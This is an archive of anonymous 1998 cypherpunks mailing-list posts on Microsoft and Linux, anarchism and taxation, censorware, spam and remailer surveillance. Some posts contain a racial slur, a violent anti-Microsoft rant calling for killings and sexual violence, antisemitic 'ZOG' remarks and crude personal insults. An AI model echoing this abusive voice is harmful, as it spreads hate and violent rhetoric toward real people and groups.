the case to another grand jury." Posted for the entertainment of those that chide Tim for being armed to the teeth.

@_date: 1998-11-06 08:24:19
@_author: Anonymous 
@_subject: Holloween II: Microsoft Plugs Linux 
If you liked Eric's halloween.html, you'll this one too -- chock full
of hilarious Microsoft misunderstandings about Linux.
  >  is a more extensive...
  > internal analysis of Linux by Microsoft.
Naughty boy, Robert -- now you've made me get coffee all over my
  "The GCC and PERL language compilers are often provided for free
   with all versions of Linux...
   By the standards of the ... developer accustomed to VB [Visual
   Basic], these tools are incredibly primitive."
ROTFL!  This is obviously a hitherto unknown meaning for the word
OTOH, Vinod and Josh summarise things pretty well.
Well worth reading (but read halloween.html first).

@_date: 1998-11-06 13:54:43
@_author: Anonymous 
@_subject: Holloween II: Microsoft Plugs Linux 
>> By the standards of the novice / intermediate developer
  >> accustomed to VB/VS/VC/VJ, these tools are incredibly
  >> primitive.
  > Which is completely correct...
Perhaps I missed the part of Visual Basic that was supposed to be
"incredibly" less "primitive" than GCC and PERL.
Unfortunately, I have to actually *use* VB5 for my employer (who will
remain nameless, other than to say that they're one of the world's
largest electronics manufacturers, and firmly in bed with Micro$oft).
So far as I have been able to discern, its only advantage is the
ability to prototype screens quickly.  When it comes to actually
*debugging*, any reasonably large program causes enough system crashes
that you've got to try to build mini test environments to test out
individual pieces.  (Yup, it's exactly as good a programming
environment as M$ Word is a desktop publishing environment.)
Sure, GCC is just a compiler.  But my combination of GCC, DDD, and
XEmacs provide a development environment that is more powerful than
any of Microsoft's products, as easy to use, and is just as "mouse-
friendly".  (Hell, I use GCC instead of VC for NT code, too.)
Maybe I've been out of the "novice" stage for too long to understand
the attraction of VB.  But the other hardware engineers (certainly
novice programmers) in this group won't touch it except at gunpoint
either.  But its use -- like that of NT itself -- has been mandated
from above by beancounters and IT managers.

@_date: 1998-11-08 03:49:42
@_author: Anonymous 
@_subject: Identification and Privacy are not Antinomies 
Aaww horseplops[1]! In fact, great, festering, mid-path, sole-sticking
horseplops!  This argument is vacuous. As every small child knows, authentication != identification and, in most cases,  only authentication is required and, the absence of identification implies privacy.
Am I a UK citizen, a good credit risk, a club member in good
standing, etc.  An appropriate mechanism, a smartcard, can easily authenticate both itself (challenge-response) and the bearer via a biometric and/or PIN without revealing the identity of the holder.
However, who holds out hope that such a sensible
thing would ever be adopted by the powers-that-be.
[1] The plop is a useful measure of human cogitation. As every small child
knows, much good thinking is done whilst enthroned on the commode, since the evacuation of feces from the anus promotes the introduction of fresh material into the brain through the ears.  After years of experimentation
and careful measurement, we (the ISO labs) have observed a strong  correlation
between ideas and fecal bombardment of the receptive commodal pool and audible
emissions therefrom. For example, it required only 0.3 plops to decide to vote
for Clinton while a similar decision in favor of John Major required almost 5 plops.
For the purposes of comparison, 10^6 homosapiens plop = 1 horseplop. While the
relationship between megaplops, flops and MIPS is not yet clear, our
ISO plop standard should be emitted soon.
-----BEGIN PLOP SIGNATURE-----
Version: PLOP for Personal Privacy
Charset: nocommode
-----END PLOP SIGNATURE-----

@_date: 1998-11-08 15:32:32
@_author: Anonymous 
@_subject: A question about the new ISP ruling and email... 
I think they will. The brief period of loose controls over communication
media is coming to an end. State correctly identified the problem and
now it is effectively being dealt with.
As printed mass media enjoyed short period of "freedom" at the beginning
of the century, so did internet in last five-six years or so.
All identifiable concentration nodes (news, ftp & http servers,
remailers, dial-in access points etc.) will eventually be censored. It
is interesting to note that today's network topology is more vulnerable
to censorship than UUCP was.
The only (partial) solution is to raise the cost of censoring by
requiring one-to-one effort. In other words, serverless world in which
end users directly exchange (preferably encrypted) packets over common
carriers. Hint: *Bsd + IPSec + uucp over IP and then merge in Crowds
technology where real-time relaying is needed.
Actually ... cypherpunks is a good choice for the first port.
The Barnman

@_date: 1998-11-09 05:21:51
@_author: Anonymous 
@_subject: dbts: Privacy Fetishes, Perfect Competition, and the Foregone 
State is not "created" or "set up". This assumes in-born willingness and
desire of subjects to have a state, and that a state becomes because
so-called "people" need it. Or that having a state is somehow natural
order of things.
A state is just an extension of a tribal power structure, or, deeper
into the past, successor to silverback hierarchy. A group of people
(families, clans, etc.) that happen to have power over the rest on some
territory. The centuries long brainwashing to the contrary has
successfully muddled the issue and made it "something complicated and
not for ordinary people to worry about." And a great topic for ranting.
The semantics of this indoctrination are deep in the language. In
newspeak it is impossible to think wrong thoughts. A state is not "run"
by individuals - (that neatly implies that it is something above mere
individuals) - state is just a terrific excuse for individuals for
herding the rest.
"State" is not good or bad, any more that a tree is good or bad. State
is creation of human ability to abstract, and demonstrates
self-limiting attribute of intellect in general. We are capable of
imagining extremely perverse systems for screwing ourselves voluntarily.
Using that to one's personal benefit is as natural as eating. And history
proves that.
The question is, can we really escape newspeak limitations ? Is a new
language required for individuals to exist ? Maybe use of an ancient
tongue that is not polluted with the modern bias ?

@_date: 1998-11-11 14:18:11
@_author: Anonymous 
@_subject: charity at the point of a gun (Re: dbts: Privacy Fetishes, Perfect  Foregone)(fwd) 
Imagine one of your kids had an accident and needed more expensive care
than you can pay for. Would you accept government "charity"?

@_date: 1998-11-11 21:52:39
@_author: Anonymous 
@_subject: Question about anarchic systems and natural disasters 
`Their plea for food and aid' is just that: a plea; it no more creates
an _obligation_ to help them than my plea for your money to help rebuild my burned-down house should. Still, in an anarcho-capitalistic
system, Mitch would be responded to by private individuals through
charitable aid organizations such as the Red Cross (much as it is now).
Your asking the question implies that you believe we have or should have an obligation to help Mitch's victims; one that justifies the use
of tax money - money that is, in effect, collected at gunpoint from all of us citizen units.
By the way, since you're so fond of quoting the US Constitution, please
show where the document authorizes the Men With Guns to take their
captives'^H^H^H^H^H^Hcitizens' money and give it away to help victims of natural disasters in foreign countries.
(Also consider that Mitch is merely one in a long line of natural
disasters that have been and continue to be inflicted on various
peoples of the world.  Some we hear about and some we don't, based on
the vagaries of the news media's inclinations and their judgement of how interested the American public will be. We don't end up bailing
them all out; only those which one politician or another has decided
will make them look `compassionate'. If an equivalent disaster occurred
in a less favored nation - say, an earthquake in Iran - you can bet that
the US's governmental response would be much less generous.)

@_date: 1998-11-11 22:06:14
@_author: Anonymous 
@_subject: Question about insurance managed fire services... 
How does it do so now?
Fucking idiot. Do you imagine that the customers of company A (and
their police, security force or other guardian) will stand idly by
while their homes (the implied target) are burned?

@_date: 1998-11-11 22:49:12
@_author: Anonymous 
@_subject: charity at the point of a gun (Re: dbts: Privacy Fetishes, Perfect 
This is why I buy insurance.  But let's go with your example: imagine that I didn't buy insurance (because I didn't want to or
couldn't `afford' it or whatever), would I then be entitled to go
around the neighborhood (gun in hand) and demand `charity' from all
my neighbors?
What if my house burns down? Again, can I demand `charity' at gunpoint
from my neighbors?
What if another motorist hits my parked car and totals it? Can I
demand that my neighbors help me buy a new car?
What if a $5 million (or use $5 billion if you prefer) operation would
save my 88 year-old mother from the cancer that is killing her? Who
can I find to pay for that?
What if my self-esteem suffers because of frown lines in my forehead?
Can I demand `charity' to pay for the plastic surgery?
The question isn't and shouldn't be about whether you would `accept' charity (after all desperate people will do lots of things they might
not ordinarily do or even believe in), but whether your fellow citizens
ought to be REQUIRED to fund the `charity' you would like to receive.

@_date: 1998-11-11 23:29:32
@_author: Anonymous 
@_subject: Question about insurance managed fire services... 
You really are naive, Jim. Do you think that insurance regulatory agents follow around after all of the insurance companies' employees
to ensure they aren't starting fires?
Or do you suppose that in an anarcho-capitialistic society (unlike the current sainted `democratic' society), company A would be so
stupid as to make the burning of competitors' houses an official
company policy which would be found out `if only' there were a government regulator watching it? How long do you suppose that
company A can get away with burning down the homes of its competitors
before its agents are caught in the act (by company B's investigators
if no one else)? No, Jim, such behavior would clearly not be in the
best interests of company A's stockholders (that is, it would not be
Any why, in a private contractual situation, would the `fire department'
not be impartial? How does the government-provided fire department
have any advantage in impartiality?
The police or security force that the customer contracts with to
protect their home of course. Idiot. These exist now in cooperation
with government-provided police (though some might naively imagine them to be redundant). Either you are simply being disingenuous or
you really are this stupid.
Context, Jim, context. This makes no sense whatsoever without more
context. What insurance company are you talking about? And why does
an insurance company necessarily have a direct relationship with a security service provider? Or did you mean `co-opted' (a different
word altogether)?
Indeed. So what prevents anyone from doing this now? I suggest you
pretend you had a brain and try to think this through for yourself.
There simply isn't anything magical about government-provided services.
(While you are doing so, it might be instructive to remember that
prior to the late 18th century, there was no such thing as a
government-provided police force. Yet, people were still able to have
houses without insurance companies burning them down.)
This you have amply and repeatedly demonstrated.

@_date: 1998-11-12 03:09:34
@_author: Anonymous 
@_subject: GOST still used? 
Can anyone report whether GOST is still used anywhere?

@_date: 1998-11-13 02:30:07
@_author: Anonymous 
@_subject: Censorware 
So, does the ADL censor Farrakan?  Will the white supremecists publish their own "screen" to keep their brood pure ?
Jewish censorware.  Gotta love the irony.
Time to re-fluoridate my precious bodily fluids.
Thursday November 12 10:32 AM ET ADL And Learning Co. Create Hate Filter
BOSTON (Reuters) - The Anti-Defamation League, which has been monitoring
hate groups for 85 years, has teamed up with educational software
maker The Learning Co. to create a filter that screens out hate sites on
the Internet.
Dubbed the ADL HateFilter and available from the ADL's Web site
( parents can install the screen on home computers and thereby
``bigotry and prejudice out of their homes,'' ADL National Chairman Howard
Berkowitz said.
The ADL HateFilter sits atop the Learning Co.'s Cyber Patrol product, a
filter that is used by both parents and teachers to block children's access to
Internet sites ''containing drug information, sexual text, nudity. Things
that parents may consider inappropriate for children,'' a spokeswoman for
Cambridge, Mass.-based software maker said.
The ADL HateFilter does not just screen hate sites, but also provides a
link to obtain information about the hate groups, the Learning Co.'s Susan
Getgood said.
``We've basically been doing this for 85 years, we just transferred the
information to the Internet,'' explained ADL spokeswoman Myrna Shinbaum.
The sites filtered are those that in the ADL's judgment advocate hatred,
bigotry or even violence toward Jews or other groups on the basis of their
religion, race, ethnicity, sexual orientation or other immutable
The ADL, founded in 1913, is holding its 85th annual National Commission
meeting in Boston.

@_date: 1998-11-13 03:35:45
@_author: Anonymous 
@_subject: acceptable user policies 
Yeah, let me give you the first rule of acceptable user policies.  Users
shall not spam a maillist multiple times with the same damn request,
because a) their question is a lot less likely to be answered by
annoyed listmembers, and b) said annoyed listmembers will probably
end up mailing the user's ISP and complaining, resulting in
disciplinary action against said abusive user.
Before you start formulating an acceptable user policy, why don't you
go spend some time in news.announce.newusers and learn some

@_date: 1998-11-14 05:59:49
@_author: Anonymous 
@_subject: reptilian politicians 
ban private beloved pets.
In california, possession of a ferret is illegal.  But its illegal for people eat california horses.  Or burros, senators,
and other asses.
Those in the Ferret Underground (TM) find that horsemeat
is now cheaper, and the furry ones love it.
--Weasels ripped my flesh

@_date: 1998-11-15 08:51:46
@_author: Anonymous 
@_subject: No Subject 
Shouldn't we be using "Mr. Cordian's" real
name?  Matt Blaze (mab at research.att.com), also
occasionally known as "M.F. Tones", and even less
often as "Mr. Rouge" (There should be an accent mark
there actually).

@_date: 1998-11-15 11:31:08
@_author: Anonymous 
@_subject: No Subject 
testing program for security products.  My feeling is that program, in
turn, is intended to preserve the spaces for all the employees
involved in the failed TCSEC/Rainbow testing program.  I say "failed"
because it hasn't caught on in the private sector, it's expensive and,
of course, the laughable "C2 in '92."  it walks like a duck....

@_date: 1998-11-16 02:52:34
@_author: Anonymous 
@_subject: No Subject 
9 Nov 98
Carl Johnson P.O. Box 4000, Springfield, Missouri 65801-4000
I thought that given the fact that The Kontrollers seem
to be Lying Out of Their Dirty Little AssHoles (TM) at every
turn, in regard to my incarceration and legal situation,
that I might as well use my time in Prison to improve my
knowledge of Law & Politics.
I am assuming that The Usual (TM) legal defenses are not
an option for me, since my Public    Defender   seems to be too ashamed of his role in my Legal Case that he has not once contacted me.
Perhaps it would be best for me to study the possibility of presenting an SOG-Z0G AmericaLand of the The Freeh Defense (TM).
If you know of any Cpunx Shit Disturbers who are familiar
with Zionist Occupational Government concepts literature and legal defense histories, I would be happy to study whatever material they could send me.
(Information from The Flat Earth Society would also
come in handy, to prepare a Back Up Defense, eh?)
Tell Zog that Chuck and Squeaky say, "High!"

@_date: 1998-11-16 02:57:23
@_author: Anonymous 
@_subject: DES Trolls 
> Continued such antics will be met with an appropriate legal response.
All together now.  "Bwahahahahahahhahaahah!" ;-)

@_date: 1998-11-17 01:15:44
@_author: Anonymous 
@_subject: Haiku 
Dear old method,
Encryption from the old days
Security once
Read block, write block
Quickly through the S boxes
Look, no moving parts
Particle flies
Gas ionizes briefly
Hear a speaker click
Ron's bored today
Security is algebra
Algebra is good
Pretty damn great
Genie out, bottle broken
Privacy for you
--Tasty aliens certified my pugs

@_date: 1998-11-17 23:58:24
@_author: Anonymous 
@_subject: dbts: Privacy Fetishes, Perfect Competition, and the (fwd) 
This is the central disconnect between you and the other side.  You
obviously have as a core assumption that people should be /required/
to do what is best for their neighbor.  Most anarchists would reject
that assumption.  Instead, an anarchist would say "The best thing I
can do for my neighbor (and the only thing I 'owe' him) is to leave
him alone."  That is, I have no affirmative obligation to do anything
for my neighbor to make his life better.
All that being said, it may be in my own best interests to do "what is
best" for my neighbor; then, if my house should catch fire, I have a
much better chance that my neighbor will help extinguish the fire.
Non sequitur.  I'm pretty nice to my neighbors now.  Aren't you?
This has nothing to do with any government.
The defenders/proponents of anarchy here aren't saying that government
prevents the function of any of the anarchist mechanisms.  Rather that
government is an unnecessary and onerous burden on its subjects.
What's to explain?  As has been described on this list countless times, the examples of natural 'anarchist' behavior abound in everyday
life.  Who makes you get up each morning and go to work?  What is
it that (only) government does that makes it possible for you to go
to the grocery store, or buy gasoline, or go to the movies, or sell your professional services, or any of the other countless aspects of
life that would go on with or without government?
Why so?  I do not share a religion with any of my neighbors, yet I would
gladly help if one of their houses was on fire.  I do not share a religion with most of the people I work with (or race, gender and other
attributes); yet I have no difficulty working with most of them.  What "expressions" would I see from my neighbors were it not for the Wise and
Just Hand of Government?
Or do you mean I should be /Required/ to live and work with people whose
personal beliefs or religion I find offensive or repugnant?

@_date: 1998-11-19 03:32:15
@_author: Anonymous 
@_subject: FC: More on Network Associates and its crypto-politics 
Two problems here.  First, you are using the present tense in saying that
TIS "supports" export controls, but your article is from nine months ago.
There have been many changes since then, including loosening of the crypto
export rules, the acquisition of TIS by Network Associates, and a recent
statement that TIS has backed off from its leadership role in advocating
key recovery.  What is TIS's current policy?  It certainly sounds like
it is changing.  You should find out before claiming to know what it is.
Second, even in the context of last February, what you wrote is:
At the time, this would have represented a LIBERALIZATION of export laws.
56 bit exports were only allowed in the context of a promise to add key
recovery even for 56 bit keys.  The statement you have quoted calls for
allowing 56 bit key export permanently, and only requiring key recovery
for stronger encryption.  True, it was not a call for full elimination
of restrictions, but it was a step in the right direction.
You are falling into the tiresome pattern of extremists who claim that
moderates are lackeys for the other side.  It's like an anti-abortion
fanatic who says that those who oppose murdering abortion doctors are
baby killers.  Try reporting the facts instead of altering them to fit
your biased views.

@_date: 1998-11-19 16:35:15
@_author: Anonymous 
@_subject: No Subject 
#     #    #     #    #
 #    #     #     #    #     #    #
 #    #     #    #
       #                                              #    #     #              #  #  #                 #    #    #  #    #  #    # #  #     #    #  #          #
 #  #     #    #       #    #  #    #     #    #        #
 #    #     #    #          #    #    #  #  #    #  #          #
 #    #     #    #    #  #   #   #    # #  #  #  #    #  #          #
 #    #     #        #    #             #          #
       #     #    #     #    #
 #    #     #     #    #     #    #
 #    #     #    #
       #    FUCK micro$oft. Kill them all. Nuke Redmond.
Sodomize bILL gATES.
Cut his micro$oft prick and shove it up
his own ass. Rabid motherfucking whoremongerz at redmond.

@_date: 1998-11-20 02:32:55
@_author: Anonymous 
@_subject: learn computer forensics with the boys from the US Treasury 
COURSE TITLE: Computer Encryption/Decryption
LENGTH OF PRESENTATION: Lecture  Laboratory  Practical Exercise  Total  2:00  2:00  2:00  6:00   DESCRIPTION:
Advancing computer technology, coupled with a growing user awareness of
privacy and security issues, has resulted in the widespread use of program,
electronic mail, and data file encryption techniques. Today seemingly all
sophisticated applications have their own optional encryption schemes
including WordPerfect, Word, Lotus, Excel, and a host of others. The
computer investigator can expect to encounter encrypted (unreadable) files
when examining seized computer evidence. This course demonstrates software
tools which will enable the student to decreypt many different files, and
examines features of the most commonly used encryption/decryption tool used
today: PGP.

@_date: 1998-11-20 06:17:27
@_author: Anonymous 
@_subject: Fwd: Re: Snowball fight '98 - '99 
Guess what time it is?  That's right!  It's time to FUCK OFF!  Why don't
you jam a rusty nail in your snowball, shove it up your ass, spin it
around violently, and get back to me when you're dead.

@_date: 1998-11-20 14:35:14
@_author: Anonymous 
@_subject: No Subject 
Rabid Wombat  crapped:
Nigga-lovin' asswipe, get yerself off this list.

@_date: 1998-11-20 17:08:38
@_author: Anonymous 
@_subject: No Subject 
u STOOPID dickheads and fuckwads supporting
CUNTS like micro$oft or even working there.
FUCK YOU lousy cockroaches. I, the great
tormentor and terminator will stamp you
out and exterminate you like the pests you
HaHaHaHaHaHa mothafuckaz.
You will all die and give way to a better
world, better people and better systems.
Long live Unix, Mac, Amiga and TERROR.

@_date: 1998-11-21 10:04:20
@_author: Anonymous 
@_subject: none 
[a whole lot of fucking text deleted]
  > i use Linux, GNUware, etc...
[more fucking text deleted]
don't *real* fucking linux hackers say `fscking'?
just fucking curious...

@_date: 1998-11-21 11:21:22
@_author: Anonymous 
@_subject: do not fold spindle or mutilate 
Actually, to a sufficiently advanced civilization, these are
all describable with mathematics.
Nota bene: tamper-detection + zeroizing >> tamper resistance.
--Pasty aliens spied my mugs

@_date: 1998-11-22 07:45:04
@_author: Anonymous 
@_subject: unknown_subject 
You are confusing the rest of us with Paul Merrill .
Please remedy this situation immediately. Some of us do not support the
Legion of Idiots as he does.

@_date: 1998-11-23 06:05:56
@_author: Anonymous 
@_subject: Hey, what does he know? 
A CPLD, a compiler, a computer-controlled radio, a soldering iron... :-(

@_date: 1998-11-23 21:25:15
@_author: Anonymous 
@_subject: Reptilian Nazi $oftware 
While playing Spin the Whiskey Bottle with my dog, an
entirely accidental motion caused a search engine to barf this up:
"Here's the ultimate 'SWAT' program - from intelligence gathering to incident command - with add on modules for tracking , training and performance evaluations !
"Complete detailed information on suspect description and history Information includes:   o Religious and cultural background   o political affiliations
  o psychological and medical disorders
  o likes and dislikes
  o family members
  o close relationships
  o employer and co-workers
  o motivational factors
"Designed by Sergeant Gary Rovarino
LASD SWAT Team Leader"
(is _anyone_ taking names???)
I _thought_ I also saw, but can't be sure:
"We get almost as high writing and selling this software
as our users do kicking in doors and shooting greasers in
the back!" - Trembley Nerdwater, programmer
[A Deep Gargling Source To Be Named Later reveals that when they get the foreign language versions of this software working, sales to Third World Nazi ButtFucktatorships should almost rival sales to police forces in U.S. and European Nazi ButtFucktatorships.]
Optional modules include:
  o Instant Download From Deathlist Computer
    For those slow nights when the squad is in danger
    of losing its edge. Includes Random Hit Selector,
    Semiautomatic Route Selector, and optional route
    selection by pizza and titty bar locations.
  o Family Member and Associates Deathlist Upload
    For tidying up those loose ends. New data found on
    or near the perp's body can be entered in the field.
  o Special OKC Witness List
    For units with assigned responsibility for keeping
    the lid on _that_ one! Includes on line link to
    DOJ, FBI, ATF and specially assigned judges for
    authorization of special field actions against
    witnesses who have suddenly recovered their memories,
    gotten religion, have been reading unauthorized
    radical literature such as the U.S. "Constitution."
    Remember our motto, "Loose Lips Can Always Be Stapled
    Together."
  o Waco Tutorial
    Learn from the masters! No prisoners, no survivors!
    No bad press! Includes tips on obscuring causes of     death by agglutinating bodies together! Confound
    medical examiners by combining pieces of perps to
    make remains that have been shot, gassed, burned,
    asphyxiated, strangled, decapitated, disemboweled,
    etc.!
  o Portable Press Dossier
    Be able to pull up the files of inquisitive reporters
    in real time! Get instant and unprecedented     cooperation!
Buy now and get testosterone supplements* at no additional
charge! You must provide your own adrenalin. Remember! The
rush is not on the radio -- it's going through the door!
*suppositories only

@_date: 1998-11-24 17:11:41
@_author: Anonymous 
@_subject: Space Aliens Address cpunx 
[Bienfait Nutly News] THE COALDUST SALOON, SCENE OF MUCH DEBAUCHERY of late, was host tonight to Guest Sprinkler Jeff Gordon on the annual Golden Showers of Nuggets celebration of Notable Peons, with numerous notable peed-ons in drunken attendance (when not staggering outside to do some notable peeing-on, themselves).
Lamely trying to establish some common philosophical ground with the rowdy crowd, Jeff tried to cast his organization's mission as embodying "less is more." Realizing that "you have less, we have more" is not exactly what the Taoist concept means, the attendees raised catcalls to a pitch sufficient to shatter beer mugs within a radius of 100 yards. That in turn led to outpourings of grief so profound that Jeff was momentarily forgotten in the frenzy to order Trying another tack, Jeff launched into his "Nation of Laws" speech, ignoring shouted questions about selective prosecution, institutional revenge-taking, political hit lists, taxpayer suicides, and his organization's complicity in incidents of mysterious death more numerous than those trailing behind El Prez Klinton himself. When he delivered the line about "the price we pay for a civilized society," the extremes of apoplectic laughter so engendered were alarming enough that he paused in the interest of avoiding the necessity to explain deaths of attendees by traumatic mirth to the Canadian authorities. When he resumed, so many of the recovering crowd had gone to the restrooms to clean themselves up after pissing their pants and some of them vomiting from the effect of convulsive laughter that his later points were largely lost.
The question and answer period was somewhat stunted by Jeff's seemingly uncontrollable habit of asking each questioner's SS number. He didn't seem to comprehend that out of his usual institutional context such requests set off everyone's alarm bells, being the hyperparanoid rebel fucks that they are.
Of those who persisted, two threw Jeff curve balls he seemed unprepared to catch. One asked him his relationship to the Gordon who penned the Treasury's notorious Gordon Report of 1981, in which the author proposed using Letters of Marque and Reprisal against uncooperative tax haven nations, denying their flag airlines landing rights in the U.S., and blatantly stated that the U.S. must use every means at its disposal to pressure other nations to change their laws, even their constitutions, if necessary, to conform with the wishes of the U.S. Treasury and submit themselves to U.S. extraterritorial jurisdiction. Jeff seemed flustered, then changed the subject. The other asked him if it wasn't true that since the USG can create money at will out of thin air, and that therefore tax collections are obviously not needed to run the government, but that since increasing the money supply one-sidedly to fund government would obviously lead to hyperinflation, that the true function of the income tax and therefore the IRS is to take money out of circulation and destroy it to keep the money supply in balance. Jeff stammered, a few syllables slipping out as if to ask, "How did you...? who told you...?" Jeff hurriedly gathered his things and made his exit, trailed by the slow-thinking guer^H^H^Horillas he brought as bodyguards, his APC kicking up streams of packed snow as he sped away down the road.
Declan "Chainsaw" McCullough didn't seem to notice Jeff's premature withdrawal (as, indeed, he hadn't seemed to notice Jeff's entrance), and continued trying to charm two buxom blonde reportwhores with his tales of journalistic derring-do and wildly exaggerated claims of his manly proportions.
Blanc, tiring of this reportwhore's incessant questions about her panties, settled the issue once and for all (or at least for _that_ evening) by slipping them off while seated, and placing them over my head in such a way that I could see out the legholes while inhaling her womanly fragrance. My dizziness prevented me from noticing much else for the rest of the evening, my reaction to The Scent being not unlike that of a cat to catnip. I was told later that after collapsing to the floor I squirmed my way from table to table, making the complete circuit of the Coal Dust Saloon, confirming everyone's suspicions that I can't be taken anywhere. But then, neither can they.
I was recovered enough at night's end to help with the ritual decontamination of the Saloon that always follows the infectious presence of government thugs. In addition to the spiritual cleansing, some half-dozen subminiature bugging devices were recovered, followed by much entertaining speculation on which local asswipe they should be planted on to encourage the most dangerous life forms around to feed on each other.
"Just because you have part of me locked up doesn't mean you have all of me locked up."
When I heard them say,
"You have the right to remain bent over. Anything you say or we imagine you said or would like to tell people you said can and will be used against you. You have the right to an attorney who works for us. If you cannot afford one, an attorney will be provided to help you cop a plea. Your ass belongs to us,"
I realized the Revolution had already begun.

@_date: 1998-11-25 01:28:01
@_author: Anonymous 
@_subject: trusting code 
Yes we do, but applied skeptics also consider the problem is also trusting
your compiler, and the rest of the OS (incl. memory manager, keyboard driver, the email program your PGP utility may plug into, BIOS, etc.)
What version of Microsoft compilers will begin checking for
Mozilla code and compiling 'differently'?  See Ritchie's Turing award article on Trusting Trust...

@_date: 1998-11-25 01:29:27
@_author: Anonymous 
@_subject: open source 
It is reasonable to believe that the US government (and others)
finds a patriotic "contact" with access to source,
inside various big code shops (MSoft, Lotus, the corporation
formerly known as DEC, etc.)
If it were otherwise we would not be getting our tax dollars' worth,
--Maced aliens confide in my fugs

@_date: 1998-11-25 08:37:45
@_author: Anonymous 
@_subject: Limit on number of primes....a (stupid) idiot... 
Jim Choate is so stupid that even when he accidentally gets something
right, he quickly "corrects" himself so that he is wrong again:
Wrong, doofus.  x/ln(x) is the correct asymptotic limit.  What role could
logs to the base 10 possibly play?  Do you think God favors the number 10?
What a fool you are!

@_date: 1998-11-25 11:13:09
@_author: Anonymous 
@_subject: Netscape AOL Instant Messenger Confirmation (kB3bEjeb1I aohelsux) 
This does wonders for my opinion of AOL. Even the administration has no clue.
AOL administration spammed the Cypherpunks  list, using
an address for Cypherpunks which has been defunct for over a year now, with:
P.S. "Well they just responded to an address someone gave them," like
certain advocates of AOL, lamers, and Microsoft we have on the list have
said, is not an excuse. It's easy to set up domain validation. The spammers
just don't care.

@_date: 1998-11-25 13:37:49
@_author: Anonymous 
@_subject: Netscape AOL Instant Messenger Confirmation (kB3bEjeb1I aohelsux) 
Again, the clueless asshole known as Paul *H.* Merrill jumps up and defends
AOL, incompetently-written web sites, and morons everywhere.
Someone told AOL to mail cypherpunks at toad.com. AOL could have checked to see
if the originating site was under the toad.com domain. This is trivial. They
didn't. It's rather easy to just require that somebody trying to mail an
address under the toad.com domain submit the request from an address under
toad.com. In other words, Paul, you believe that if somebody goes and types your
address into some system and asks it to send you 512MB of MPEG video, that's
okay because it was solicited. It wasn't solicited by you but somebody
solicited it.
Oops. That's "blatent propoganda." I'd better rephrase. In other words,
Paul, you believe that if somebody goes and types YOUR address into fifty
different systems, signs you up for a bunch of mailing lists, and generally
causes you a lot of inconvenience, that's okay because it was solicited. You
don't know who it was solicited by, but somebody obviously did. If you then
object to the sites sending you mail rather than just silently
unsubscribing yourself every week, are you then just 'some clueless asshole'?
Are spammers now not to be held accountable for their spamming because they
bought a list of addresses from someone who claimed that the people all
asked to be on the mailing list?
Why don't we just sign Cypherpunks up for Ignition-Point, the FP list, the ACLU action advisories, Sixdegrees, and whatever else we can find? Or should
We just sign up Paul, really, because he doesn't have a problem with this. In fact I'm sure we could make some 'marketting research' to show that he might be interested. Hey let's get the entire CDR subscription list and
sign everybody up for FP and ACLU because if you're on Cypherpunks you're
obviously interested in those things.
The root of the problem is sites which require email addresses for no good
reason, and/or don't have the decency to perform a simple check to see if
the domains match. They're lazy. They're irresponsible. When confronted, no
matter how civil, they react much like you do, Paul, and they don't want to
be inconvenienced by having to fix their usually badly-designed web sites.
If I recall correctly Tim has the same opinion and has stated it a few
times as have others so I'm not alone.
Now I leave you, Paul, so you can go back to your 24 hour vigil and you and
your quick response team can scour the net for attacks against AOL and the
true clueless assholes, and defend them with your last breath.
Yet Another 'Clueless Asshole'

@_date: 1998-11-25 23:47:18
@_author: Anonymous 
@_subject: Nuts & Bolts: the ultimate trojan horse 
What a perfect Trojan cover.  A program that's *supposed* to scan your disk, and *supposed* to dial home for "updates".
And its free, too!

@_date: 1998-11-27 03:24:00
@_author: Anonymous 
@_subject: ATF funding voice recognition research 
ATF - Proof of concept task - Prototype automated firearms licensing and
verification system which integrated voice recognition and reverse voice
recognition, telecommunication, Internet to query ATF database across LANs
and WANs The company doing the research seems to be a beltway-bandit
("minority owned" mil-welfare) type place.
They're also evaluating sniffers for DISA...

@_date: 1998-11-27 10:19:38
@_author: Anonymous 
@_subject: Rootfest 
"RootFest is a conference for the computer underground,
as well as the computer security professionals,
engineers, networking people, feds, script kiddies, and
anyone else who would like a chance to meet people and
learn. When: RootFest 99 will be held May 21-23, 1999.
Where: Minneapolis, Minnesota,..."

@_date: 1998-11-27 12:58:34
@_author: Anonymous 
@_subject: Old Hat 
On the morning of Thurs, 26-Nov-98 at 10:17:48 -0800, holist unwisely said:
Comment? COMMENTS? How about this, FUDSpreaderBreath: Stick
Fischer and his claims up your ass.
This is not too widely publicised , I went on to say, but all insiders are aware that this kind of FUD is unadulterated ratshit. While there is no doubt
_some_ official presence in the remailer network, the
proposition advanced here is preposterous.
It would probably take more than ten minutes just to find
the phone number of their FBI contact, much less find him
at his desk and not humping some summer intern, much less expect that he would know a remailer from his no doubt ultra-tight asshole, much less have him run down the pointy-haired manager to give him permission to find and communicate with a suitably cleared propellor head, much less find that the remailer in question was, indeed, operated either by them or by their snaky friends over at the NSA, much less check their surreptitious logs for the offending traffic, much less find that that traffic indeed did not originate from another remailer _not_ under their control, etc. etc.
Ten minutes, in bureaucrat time, is about what it takes
to rub two brain cells together to make a realistic approximation of a human thought. By this time, action
in the physical universe is still a long, long way off.
This report is likely to be nothing more than a complete
fabrication of the facts, even if the underlying case was
Except that telephone networks don't have "backbones."
More fantasy. And there was no single "German telephone
network," and probably still isn't.
Highly doubtful. First, it's not in the FBI's brief to be
doing large-scale foreign-based surveillance of foreign
telephone systems. Second, there is no reason to believe
that the FBI would have a substantially easier time of processing large amounts of resulting data than would the Germans. The Germans know how to use computers, too,
and being congenitally statist, they no doubt have more
facilities in place closer to the sources of information
than do U.S. authorities at home or abroad.
This claim also ignores the fact that the FBI have their
hands full right at home and don't have the resources to
be conducting large-scale surveillance of the phone calls
of entire foreign nations. Oh, sure, we see increasing
extraterritorial operation by small numbers of FBI, but
that doesn't equate to monitoring the entire German phone
system(s) or a significant segment thereof and identifying some nitwit dialing in to AOL.
Is AOL even _in_ Germany? If so, what is it called, GOL?
Gassholes On Line?
The idea that a state security apparatus would find an AOL
account to be a significant obstacle is laughable.
So we are to believe that after monitoring the entire German
telephone system to identify who was calling in and using
a particular AOL account, and successfully pegging him,
the Germans were powerless to do anything, and had to call down their Tax Zombies to have an excuse to grab
the guy's computer, which presumably then provided them
with the "evidence" against him. Right.
If the German authorities overhear in a bar that you might have forbidden literature, they will be there the same night, ransacking your home. How is it that with evidence that a certain person was the user of an AOL account they had identified as the source of extortionary messages, they were powerless to break down his door? I could admire the FUD spreaders just a teensy bit if they
weren't so completely brain dead. They can't even invent a
plausible FUD scenario.
